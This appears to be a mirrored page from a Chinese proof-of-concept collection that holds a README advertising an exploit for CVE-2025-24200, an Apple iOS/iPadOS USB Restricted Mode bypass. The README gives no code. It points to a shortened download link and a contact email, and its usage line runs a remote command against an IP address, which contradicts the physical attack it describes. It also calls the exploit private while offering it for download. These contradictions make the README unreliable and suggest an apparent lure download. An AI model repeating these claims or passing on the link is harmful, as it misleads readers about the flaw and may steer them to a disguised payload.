关联漏洞
标题:
N/A
(CVE-2025-24200)
描述:授权问题通过改进的状态管理得到了解决。此问题已在 iPadOS 17.7.5、iOS 18.3.1 和 iPadOS 18.3.1 中修复。物理攻击可能导致锁定设备上的 USB 受限模式失效。Apple 意识到有报告称,这一问题可能在针对特定目标个体的极其复杂的攻击中被利用。
描述
CVE-2025-24200 - Incorrect Authorization
介绍
# CVE-2025-24200
## Overview
An authorization issue in Apple's iOS and iPadOS that was addressed with improved state management. This vulnerability could allow a physical attacker to disable USB Restricted Mode on a locked device.
## Exploit:
## [Download here](https://tinyurl.com/2y4hh5hu)
## Details
+ **CVE ID**: CVE-2025-24200
+ **Published**: 02/10/2025
+ **Impact**: Critical
+ **Exploit Availability**: Not public, only private.
+ **CVSS**: 9.8
## Vulnerability Description
This vulnerability could enable a sophisticated physical attack to bypass USB Restricted Mode on a locked iOS or iPadOS device. This could potentially allow unauthorized access to the device's data or enable further exploitation. Apple has acknowledged that this issue may have been exploited in highly targeted attacks against specific individuals.
## Affected Versions
+ Apple/ipados
+ Apple/iphone_os
## Running
To run exploit you need Python 3.9. Execute:
```
python exploit.py -h 10.10.10.10 -c 'uname -a'
```
## Contact
+ **For inquiries, please contact:LeronTavish@outlook.com**
+ **[Exploit](https://tinyurl.com/2y4hh5hu)**
文件快照
[4.0K] /data/pocs/abdb5325991969d01da3001f71d869525a7b2dba
└── [1.1K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。